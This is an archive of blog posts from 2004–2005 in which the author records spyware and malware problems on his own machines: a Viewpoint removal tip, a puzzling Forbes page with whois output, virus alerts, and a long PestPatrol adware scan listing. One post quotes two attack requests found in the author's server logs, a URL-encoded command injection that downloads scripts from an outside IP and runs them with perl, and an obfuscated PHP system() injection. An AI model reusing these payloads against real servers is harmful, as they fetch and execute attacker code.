May 12, 2005

Viewpoint Media Player - Don't click Update!

Have you ever opened up an exam to find that you didn't study the right section of the book? That horrible gut wrenching feeling is what I felt when I read "You have been Updated". After updating your Viewpoint Media Player, which you probably didn't even know you had, it asks you to click "Update" to install a "new browser update" with "advanced pop-up blocking and graphically enhanced search". No X to close the window, no "No thanks", not even a right-click is allowed, just "More info" and "Update". This is so wrong. I don't care what it does, I want "the eye" out of my computer. I'm not the only one.

Kill it. First go to Add and Remove Programs in the control panel and Remove "Viewpoint Manager". That will clear out the popup. Then, uninstall Viewpoint Media Player. I bet you are feeling better already. I sure am.

Posted by torque at 1:07 PM | Comments (9) | TrackBack

March 11, 2005

Forbes hacked?

I followed a link from Yahoo to Forbes this evening and, huh? Hello, World! This is now server 192.168.1.87

Who is 192.168.1.87?

OrgName:    Internet Assigned Numbers Authority 
OrgID:      IANA
Address:    4676 Admiralty Way, Suite 330
City:       Marina del Rey
StateProv:  CA
PostalCode: 90292-6695
Country:    US

NetRange:   192.168.0.0 - 192.168.255.255 
CIDR:       192.168.0.0/16 
NetName:    IANA-CBLK1
NetHandle:  NET-192-168-0-0-1
Parent:     NET-192-0-0-0-0
NetType:    IANA Special Use
NameServer: BLACKHOLE-1.IANA.ORG
NameServer: BLACKHOLE-2.IANA.ORG
Comment:    This block is reserved for special purposes.
Comment:    Please see RFC 1918 for additional information.
Comment:    
RegDate:    1994-03-15
Updated:    2002-09-16

OrgAbuseHandle: IANA-IP-ARIN
OrgAbuseName:   Internet Corporation for Assigned Names and Number 
OrgAbusePhone:  +1-310-301-5820
OrgAbuseEmail:  abuse@iana.org

OrgTechHandle: IANA-IP-ARIN
OrgTechName:   Internet Corporation for Assigned Names and Number 
OrgTechPhone:  +1-310-301-5820
OrgTechEmail:  abuse@iana.org

# ARIN WHOIS database, last updated 2005-03-11 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.
From this it seems more as if there was some router or nameserver issue. I checked the domain registry and, as you might have guessed, forbes.com is well registered, with an expiration date in 2014.

Pinging the domain takes you to 63.240.4.17.

SAVVIS Communications Corporation SAVVIS8 (NET-64-240-0-0-1) 
                                  64.240.0.0 - 64.243.255.255
EBC SAVV-S214013-2 (NET-64-240-4-128-1) 
                                  64.240.4.128 - 64.240.4.255

# ARIN WHOIS database, last updated 2005-03-11 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.

Update. Hmm, maybe it is just me. I checked using a shell account and I can reach the forbes site using lynx using both forbes.com and 64.240.4.179. Interesting, forbes.com uses imrworldwide.com, a.k.a. RedSheriff, Nielsen's baby. Back to topic though, I checked using Remote Desktop from my work, and the site works fine. I think there is something funny with my computer. Reboot?

Update 2. It has something to do with the local network I am on. Both my desktop and my laptop are showing the same message. Strange.

Posted by torque at 9:20 PM | Comments (0) | TrackBack

January 10, 2005

Another hacking attempt?

I saw this strange entry in the logs today:

207.218.248.100 xxxxxx.com - [10/Jan/2005:12:28:57 -0800] "GET /archives/cat_web_design.html&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;mkdir%20.temp;cd%20.temp;wget%20http://66.90.79.18/.zk/a.txt;wget%20http://66.90.79.18/.zk/ssh.txt;perl%20a.txt;rm%20a.txt;perl%20ssh.txt;rm%20ssh.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 404 201 "-" "LWP::Simple/5.803"
LWP is a perl library Hmmm, here's some more evil looking GETs
69.20.58.133 xxxxxx.com - [10/Jan/2005:12:28:24 -0800] "GET /viewtopic.php?t=547&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 11533 "-" "Mozilla/4.0"

Posted by torque at 12:30 PM | Comments (5) | TrackBack

November 12, 2004

W32.HLLW.Gaobot - Gaobot creates infected runsvc32

What to do? With a few days left for my presentation, I suddenly found my laptop infected with this Gaobot virus. Symantec detected the problem but was unable to clean, disinfect or delete the file. I subsequently deleted runsvc32.exe after rebooting. The funny thing was that this executable was lying in a very random folder. From Greatis Software it is clear that this virus most likely infects through the network, through the DCOM PRC vulnerability. So am I still infected? How do I kill this? Symantec has a removal tool.

Posted by torque at 10:12 PM | Comments (0) | TrackBack

October 28, 2004

Zafi-C

Technically not spyware but just as annoying, Robert Jaques at Forbes today reported on the Zafi-C virus, which targets Google, Microsoft and the newly appointed Hungarian prime minister for distributed denial of serviec attacks. According to Sophos, spreading by email attachment with socially engineered subjects like 'Re: Hey buddy!' and 'Re: very sick little girl!', it "turns off anti-virus applications, sends itself to email addresses found on the infected computer, forges the sender's email address, uses its own emailing engine and installs itself in the Registry".

Posted by torque at 9:30 AM | Comments (49) | TrackBack

October 15, 2004

Block Undertone Networks

Technically it isn't spyware, but it sort of is. Why isn't my Google pop-up blocker working for Undertone Networks? This article lays it out.

Some new pop-up techniques simply avoid that command, thus subverting blockers that rely on suppressing it. For example, some advertisers are sending pop-ups through a "user initiated command" triggered when people mouse over an object on the page, according to ad executives familiar with the technique.

Posted by torque at 10:08 AM | Comments (6) | TrackBack

September 8, 2004

Hacktool.Rootkit

Thank goodness for Symantec AntiVirus. I got this notification this morning

Scan type: Realtime Protection Scan
Event: Virus Found!
Virus name: Hacktool.Rootkit
File: C:\Documents and Settings\Owner\Local Settings\Temporary Internet Files\Content.IE5\A54BUXE1\sense[1].txt
Location: C:\Documents and Settings\Owner\Local Settings\Temporary Internet Files\Content.IE5\A54BUXE1
Computer: BRAINWAVE
User: Owner
Action taken: Clean failed : Quarantine failed : Access denied
Date found: Wednesday, September 08, 2004 9:00:26 AM
How did this happen?

Posted by torque at 9:03 AM | Comments (39) | TrackBack

June 6, 2004

Killing the featured-results.com pop-up

This is really depressing. After I delete the suspect files, e.g., inetp60.dll and rundll32.exe. They reappear! Unbelieveable. It is self-healing adware. I finally brokedown and downloaded PestPatrol which, without payment, won't delete anything.

Here's what I found:

1AtlasDMT.com Spyware CookieCategory: Spyware Cookie
Background Info: Click here
In File: C:\Documents and Settings\Test\Cookies\test@atdmt[2].txt
Tracking URL: atdmt.com
Hits: 3
Received: 6/5/2004 11:08:36 PM
Expires: 6/4/2009 5:00:00 PM
Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete
2Bluestreak.com Spyware CookieCategory: Spyware Cookie
Background Info: Click here
In File: C:\Documents and Settings\Test\Cookies\test@bluestreak[1].txt
Tracking URL: bluestreak.com
Hits: 5
Received: 6/6/2004 2:59:32 PM
Expires: 6/4/2014 10:58:48 AM
Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete
3DoubleClick Spyware CookieCategory: Spyware Cookie
Background Info: Click here
In File: C:\Documents and Settings\Test\Cookies\test@doubleclick[1].txt
Tracking URL: doubleclick.net
Hits: 10
Received: 6/6/2004 7:53:50 AM
Expires: 6/6/2007 7:53:06 AM
Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete
4Ehg.Hitbox Spyware CookieCategory: Spyware Cookie
Background Info: Click here
In File: C:\Documents and Settings\Test\Cookies\test@ehg.hitbox[2].txt
Tracking URL: ehg.hitbox.com
Hits: 2
Received: 6/6/2004 2:54:50 PM
Expires: 6/6/2005 2:54:06 PM
Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete
5HitBox.com Spyware CookieCategory: Spyware Cookie
Background Info: Click here
In File: C:\Documents and Settings\Test\Cookies\test@hitbox[2].txt
Tracking URL: hitbox.com
Hits: 5
Received: 6/6/2004 2:54:50 PM
Expires: 6/6/2005 2:54:06 PM
Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete
6Statcounter Spyware CookieCategory: Spyware Cookie
Background Info: Click here
In File: C:\Documents and Settings\Test\Cookies\test@statcounter[2].txt
Tracking URL: statcounter.com
Hits: 3
Received: 6/6/2004 2:54:36 PM
Expires: 6/5/2009 2:53:12 PM
Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete
7AdRoarCategory: Adware
Background Info: Click here
In Registry: HKEY_CLASSES_ROOT\clsid\{fac6e0e1-5d45-4907-bc00-302d702dcc73}Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
8AdRoarCategory: Adware
Background Info: Click here
In Registry: HKEY_CLASSES_ROOT\cpr.iehelperopCertainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
9AdRoarCategory: Adware
Background Info: Click here
In Registry: HKEY_CLASSES_ROOT\interface\{91d91d21-8008-429d-821c-7266aac84a9f}Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
10AdRoarCategory: Adware
Background Info: Click here
In Registry: HKEY_CLASSES_ROOT\typelib\{ace8d3ba-7742-44c4-920d-fd25bd1e8245}Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
11AdRoarCategory: Adware
Background Info: Click here
In Registry: HKEY_LOCAL_MACHINE\software\classes\clsid\{fac6e0e1-5d45-4907-bc00-302d702dcc73}Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
12AdRoarCategory: Adware
Background Info: Click here
In Registry: HKEY_LOCAL_MACHINE\software\microsoft\internet explorer\toolbar|{bdf6ce3d-f5c5-4462-9814-3c8eac330ca8}Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
13AdRoarCategory: Adware
Background Info: Click here
In Registry: HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\browser helper objects\{bdf6ce3d-f5c5-4462-9814-3c8eac330ca8}Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
14AdRoarCategory: Adware
Background Info: Click here
In Registry: HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\browser helper objects\{fac6e0e1-5d45-4907-bc00-302d702dcc73}Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
15BargainBuddyCategory: Adware
Background Info: Click here
In Registry: HKEY_LOCAL_MACHINE\software\classes\interface\{9d1b86c7-1b93-4586-9009-ea3bd0ad63a5}Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
16BargainBuddyCategory: Adware
Background Info: Click here
In Registry: HKEY_LOCAL_MACHINE\software\classes\interface\{b8afa251-4efb-4703-87d4-da7d2435ba5e}Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
17BargainBuddyCategory: Adware
Background Info: Click here
In Registry: HKEY_LOCAL_MACHINE\software\classes\interface\{df7d760c-b7e2-4735-bb77-f5a1a9745e16}Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
18BrowserAidCategory: Adware
Background Info: Click here
In Registry: HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\runwindowsupdateCertainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
19BrowserAid.ABCSearchCategory: Adware
Background Info: Click here
In Registry: HKEY_CLASSES_ROOT\typelib\{7eb64065-dfd1-41b0-99d7-6ba3e0a15916}Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
20BrowserAid.ABCSearchCategory: Adware
Background Info: Click here
In Registry: HKEY_CURRENT_USER\software\popup stopperCertainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
21BrowserPalCategory: Adware
Background Info: Click here
In Registry: HKEY_CURRENT_USER\software\browser palCertainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
22BrowserPalCategory: Adware
Background Info: Click here
In Registry: HKEY_LOCAL_MACHINE\software\browser palCertainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
23BrowserPalCategory: Adware
Background Info: Click here
In Registry: HKEY_LOCAL_MACHINE\software\microsoft\internet explorer\extensions\{07b7f771-1b8e-4b7b-823e-ffac1732aa9f}Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
24DownloadWareCategory: Adware
Background Info: Click here
In Registry: HKEY_LOCAL_MACHINE\software\classes\btieinscriptconfigproj.btieinscriptconfigCertainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
25DownloadWareCategory: Adware
Background Info: Click here
In Registry: HKEY_LOCAL_MACHINE\software\classes\clsid\{26e8361f-bce7-4f75-a347-98c88b418322}Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
26DownloadWareCategory: Adware
Background Info: Click here
In Registry: HKEY_LOCAL_MACHINE\software\classes\interface\{26e8361f-bce7-4f75-a347-98c88b418321}Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
27DownloadWareCategory: Adware
Background Info: Click here
In Registry: HKEY_LOCAL_MACHINE\software\classes\typelib\{26e8361f-bce7-4f75-a347-98c88b418328}Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
28DownloadWareCategory: Adware
Background Info: Click here
In Registry: HKEY_LOCAL_MACHINE\software\classes\typelib\{53f066f0-a4c0-4f46-83eb-2dfd03f938cf}Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
29ExactSearchBarCategory: Adware
Background Info: Click here
In Registry: HKEY_CLASSES_ROOT\typelib\{53f066f0-a4c0-4f46-83eb-2dfd03f938cf}Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
30Ezula TopTextCategory: Adware
Background Info: Click here
In Registry: HKEY_LOCAL_MACHINE\software\classes\interface\{226a045e-fd4e-4632-b51d-a112bd8254e5}Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
31Ezula TopTextCategory: Adware
Background Info: Click here
In Registry: HKEY_LOCAL_MACHINE\software\classes\interface\{f6fbfe07-ca76-438e-b34e-4f4dc41f0123}Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
32FactoryNetwork DialerCategory: Adware
Background Info: Click here
In Registry: HKEY_LOCAL_MACHINE\software\dksoftwareCertainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
33Gigatech SuperbarCategory: Adware
Background Info: Click here
In Registry: HKEY_CLASSES_ROOT\interface\{9d1b86c7-1b93-4586-9009-ea3bd0ad63a5}Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
34Gigatech SuperbarCategory: Adware
Background Info: Click here
In Registry: HKEY_CLASSES_ROOT\interface\{b8afa251-4efb-4703-87d4-da7d2435ba5e}Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
35Gigatech SuperbarCategory: Adware
Background Info: Click here
In Registry: HKEY_CLASSES_ROOT\interface\{df7d760c-b7e2-4735-bb77-f5a1a9745e16}Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
36HuntBarCategory: Adware
Background Info: Click here
In Registry: HKEY_CLASSES_ROOT\typelib\{26e8361f-bce7-4f75-a347-98c88b418328}Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
37IBIS ToolbarCategory: Adware
Background Info: Click here
In Registry: HKEY_CLASSES_ROOT\btieinscriptconfigproj.btieinscriptconfigCertainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
38IBIS ToolbarCategory: Adware
Background Info: Click here
In Registry: HKEY_CLASSES_ROOT\clsid\{26e8361f-bce7-4f75-a347-98c88b418322}Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
39IBIS ToolbarCategory: Adware
Background Info: Click here
In Registry: HKEY_CLASSES_ROOT\interface\{26e8361f-bce7-4f75-a347-98c88b418321}Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
40IBIS ToolbarCategory: Adware
Background Info: Click here
In Registry: HKEY_CLASSES_ROOT\protocols\handler\relatedlinksCertainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
41IBIS ToolbarCategory: Adware
Background Info: Click here
In Registry: HKEY_CLASSES_ROOT\protocols\name-space handler\res\btlink.resprotocolCertainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
42IGetNetCategory: Adware
Background Info: Click here
In Registry: HKEY_CLASSES_ROOT\interface\{226a045e-fd4e-4632-b51d-a112bd8254e5}Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
43IGetNetCategory: Adware
Background Info: Click here
In Registry: HKEY_CLASSES_ROOT\interface\{f6fbfe07-ca76-438e-b34e-4f4dc41f0123}Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
44INetSpeak.IexplorrCategory: Adware
Background Info: Click here
In Registry: HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\browser helper objects\{4cebbc6b-5cee-4644-80cf-38980bae93f6}Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
45INetSpeak.IexplorrCategory: Adware
Background Info: Click here
In Registry: HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\browser helper objects\{6b12dabb-0b7c-44fa-b0b3-4baff3790256}Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
46KaZaACategory: Adware
Background Info: Click here
In Registry: HKEY_CURRENT_USER\software\kazaaCertainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
47KaZaACategory: Adware
Background Info: Click here
In Registry: HKEY_LOCAL_MACHINE\software\kazaaCertainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
48KaZaACategory: Adware
Background Info: Click here
In Registry: HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\app paths\d:\installshield\kazaaCertainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
49Marketscore(Netsetter)Category: Adware
Background Info: Click here
In Registry: HKEY_LOCAL_MACHINE\software\netsetterCertainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
50SAHAgentCategory: Adware
Background Info: Click here
In Registry: HKEY_LOCAL_MACHINE\software\vgroupCertainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
51WurldMediaCategory: Adware
Background Info: Click here
In Registry: HKEY_CLASSES_ROOT\tchk.tchkbhoCertainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or ignore
52AdRoarCategory: Adware
Background Info: Click here
In File: C:\WINNT\system32\cpr.dll
Date: 12/18/2003 10:26:56 AM
Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Moderate - this file can be executed!
Advice: Delete or quarantine
53AtomWireCategory: Adware
Background Info: Click here
In File: C:\WINNT\iexplorr23.dll
Date: 4/18/2003 4:32:20 PM
Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Moderate - this file can be executed!
Advice: Delete or quarantine
54AtomWireCategory: Adware
Background Info: Click here
In File: C:\WINNT\iexplorr24.dll
Date: 4/18/2003 4:32:42 PM
Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Moderate - this file can be executed!
Advice: Delete or quarantine
55BargainBuddyCategory: Adware
Background Info: Click here
In File: C:\WINNT\system32\msbb.dll
Date: 5/5/2003 8:57:50 PM
File Description: exe_in_dll Module
File Version: 1, 0, 0, 1
Internal Name: exe_in_dll
Legal Copyright: Copyright 2001
Original Filename: exe_in_dll.DLL
Product Name: exe_in_dll Module
Product Version: 1, 0, 0, 1
Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Moderate - this file can be executed!
Advice: Delete or quarantine
56BargainBuddyCategory: Adware
Background Info: Click here
In File: C:\WINNT\system32\msbb1.dll
Date: 7/26/2003 7:50:56 AM
File Description: exe_in_dll Module
File Version: 1, 0, 0, 1
Internal Name: exe_in_dll
Legal Copyright: Copyright 2001
Original Filename: exe_in_dll.DLL
Product Name: exe_in_dll Module
Product Version: 1, 0, 0, 1
Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Moderate - this file can be executed!
Advice: Delete or quarantine
57BargainBuddyCategory: Adware
Background Info: Click here
In File: C:\WINNT\system32\mset_bbi8010.dll
Date: 5/8/2003 9:30:54 PM
File Description: exe_in_dll Module
File Version: 1, 0, 0, 1
Internal Name: exe_in_dll
Legal Copyright: Copyright 2001
Original Filename: exe_in_dll.DLL
Product Name: exe_in_dll Module
Product Version: 1, 0, 0, 1
Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Moderate - this file can be executed!
Advice: Delete or quarantine
58BargainBuddyCategory: Adware
Background Info: Click here
In File: C:\WINNT\system32\mset_bbi80101.dll
Date: 7/22/2003 9:29:44 PM
File Description: exe_in_dll Module
File Version: 1, 0, 0, 1
Internal Name: exe_in_dll
Legal Copyright: Copyright 2001
Original Filename: exe_in_dll.DLL
Product Name: exe_in_dll Module
Product Version: 1, 0, 0, 1
Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Moderate - this file can be executed!
Advice: Delete or quarantine
59BrowserAid.RunDLL16Category: Adware
Background Info: Click here
In File: C:\WINNT\uptodate.exe
Date: 3/25/2003 2:51:10 PM
Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Moderate - this file can be executed!
Advice: Delete or quarantine
60BrowserAid.SearchandClickCategory: Adware
Background Info: Click here
In File: C:\WINNT\system32\inetp60.dll
Date: 2/7/2004 9:38:46 AM
Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Moderate - this file can be executed!
Advice: Delete or quarantine
61CommonNameCategory: Adware
Background Info: Click here
In File: C:\WINNT\system32\winnet.ini
Date: 9/24/2003 9:17:42 PM
Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or quarantine
62CydoorCategory: Adware
Background Info: Click here
In File: C:\Documents and Settings\Test\local settings\temp\cd_clint.dll
Date: 1/14/2002 2:57:00 PM
Company Name: Cydoor Technologies, Inc.
File Description: Cydoor Technologies ad-system
File Version: 3, 2, 1, 0
Internal Name: CD_Clint.dll
Legal Copyright: Copyright (C) Cydoor Technologies, Inc. 1999-2001
Original Filename: CD_Clint.dll
Product Name: Cydoor Technologies ad-system
Product Version: 3, 2, 1, 0
Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Moderate - this file can be executed!
Advice: Delete or quarantine
63ExactSearchBarCategory: Adware
Background Info: Click here
In File: C:\WINNT\system32\ezstubi.dll
Date: 6/7/2003 6:34:04 PM
File Description: exe_in_dll Module
File Version: 1, 0, 0, 1
Internal Name: exe_in_dll
Legal Copyright: Copyright 2001
Original Filename: exe_in_dll.DLL
Product Name: exe_in_dll Module
Product Version: 1, 0, 0, 1
Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Moderate - this file can be executed!
Advice: Delete or quarantine
64Ezula TopTextCategory: Adware
Background Info: Click here
In File: C:\WINNT\system32\ezstubtt.exe
Date: 6/7/2003 6:34:04 PM
File Description: LOP Application
File Version: 1, 0, 0, 1
Internal Name: LOP
Legal Copyright: Copyright (C) 2002
Original Filename: LOP.exe
Product Name: LOP Application
Product Version: 1, 0, 0, 1
Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Moderate - this file can be executed!
Advice: Delete or quarantine
65FavoriteManCategory: Adware
Background Info: Click here
In File: C:\WINNT\system32\mbr32.dll
Date: 5/10/2004 7:37:00 PM
Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Moderate - this file can be executed!
Advice: Delete or quarantine
66FavoriteManCategory: Adware
Background Info: Click here
In File: C:\WINNT\system32\mpz300.dll
Date: 3/5/2003 4:09:58 PM
File Description: F1 - Windows help for smart browsing
File Version: 3, 0, 0, 1
Internal Name: F1
Legal Copyright: Copyright 2001
Original Filename: F1.DLL
Product Name: F1
Product Version: 3, 0, 0, 1
Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Moderate - this file can be executed!
Advice: Delete or quarantine
67IGetNetCategory: Adware
Background Info: Click here
In File: C:\WINNT\system\update_com.dll
Date: 8/31/2003 11:28:24 AM
Company Name: iGetNet.com
File Description: Natural Language Navigation
File Version: 6.00.0005
Internal Name: Rsp001
Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Moderate - this file can be executed!
Advice: Delete or quarantine
68IPInsightCategory: Adware
Background Info: Click here
In File: C:\WINNT\sentry.ini
Date: 5/4/2003 1:58:02 PM
Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or quarantine
69MSViewCategory: Adware
Background Info: Click here
In File: C:\WINNT\inf\msview.inf
Date: 6/16/2003 1:05:42 PM
Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Moderate - this file can be executed!
Advice: Delete or quarantine
70MSViewCategory: Adware
Background Info: Click here
In File: C:\WINNT\msvprep.exe
Date: 6/16/2003 1:03:20 PM
Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Moderate - this file can be executed!
Advice: Delete or quarantine
71NCaseCategory: Adware
Background Info: Click here
In File: C:\WINNT\system32\ncmyb.dll
Date: 7/26/2003 7:53:12 AM
Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Moderate - this file can be executed!
Advice: Delete or quarantine
72NetPalCategory: Adware
Background Info: Click here
In File: C:\WINNT\system32\netpals.dll
Date: 8/19/2003 1:54:40 PM
File Description: exe_in_dll Module
File Version: 1, 0, 0, 1
Internal Name: exe_in_dll
Legal Copyright: Copyright 2001
Original Filename: exe_in_dll.DLL
Product Name: exe_in_dll Module
Product Version: 1, 0, 0, 1
Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Moderate - this file can be executed!
Advice: Delete or quarantine
73NetSetterCategory: Adware
Background Info: Click here
In File: C:\WINNT\system32\csloa.dll
Date: 4/29/2003 10:16:18 PM
Company Name: comScore Inc.
File Description: AOL Adapter
File Version: 3, 0, 5, 41
Internal Name: csloa
Legal Copyright: Copyright 2000
Original Filename: csloa.DLL
Product Name: csloa Module
Product Version: 3, 0, 5, 41
Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Moderate - this file can be executed!
Advice: Delete or quarantine
74SAHAgentCategory: Adware
Background Info: Click here
In File: C:\WINNT\sahuninstall.exe
Date: 5/6/2003 4:04:42 AM
Company Name: -
File Description: SAHUninstall
File Version: 1, 1, 1, 17
Internal Name: SAHUninstall
Legal Copyright: Copyright 2002
Original Filename: SAHUninstall.dll
Product Name: - SAHUninstall
Product Version: 1, 1, 1, 17
Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Moderate - this file can be executed!
Advice: Delete or quarantine
75BrowserAid.ABCSearch DirectoryCategory: Adware
Background Info: Click here
In Directory: C:\Documents and Settings\Test\application data\browser pal
Date: 6/4/2003 5:55:50 PM
Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete when empty
76BrowserAid.ABCSearch?Category: Adware
Background Info: Click here
In File: C:\Documents and Settings\Test\application data\browser pal\bpcfg.xml
Date: 6/4/2003 5:55:50 PM
Certainty: Suspected
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or quarantine
77BrowserAid.ABCSearch?Category: Adware
Background Info: Click here
In File: C:\Documents and Settings\Test\application data\browser pal\pstopper.sts
Date: 6/4/2003 10:30:12 PM
Certainty: Suspected
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete or quarantine
78ClearSearch DirectoryCategory: Adware
Background Info: Click here
In Directory: C:\Documents and Settings\Test\local settings\temp\clrsch
Date: 6/6/2004 7:53:12 AM
Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete when empty
79ClearSearch DirectoryCategory: Adware
Background Info: Click here
In Directory: C:\Documents and Settings\Test\locals~1\temp\clrsch
Date: 6/6/2004 7:53:12 AM
Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete when empty
80IBIS Toolbar DirectoryCategory: Adware
Background Info: Click here
In Directory: C:\Program Files\common files\btlink
Date: 1/17/2004 7:52:08 PM
Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete when empty
81Lycos Sidesearch DirectoryCategory: Adware
Background Info: Click here
In Directory: C:\Program Files\lycos
Date: 10/3/2003 9:25:58 PM
Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete when empty
82Lycos Sidesearch DirectoryCategory: Adware
Background Info: Click here
In Directory: C:\Program Files\lycos\Sidesearch
Date: 12/15/2003 11:15:14 PM
Certainty: Confirmed
Threatens: Confidentiality, Liability
Risk: Low.
Advice: Delete when empty
83Lycos Sidesearch DirectoryCategory: Adware
Background Info: Click here
In Directory: C:\Program Files\lycos\Sidesearch\temp
Date: 12/16/2003 9:08:22 PM
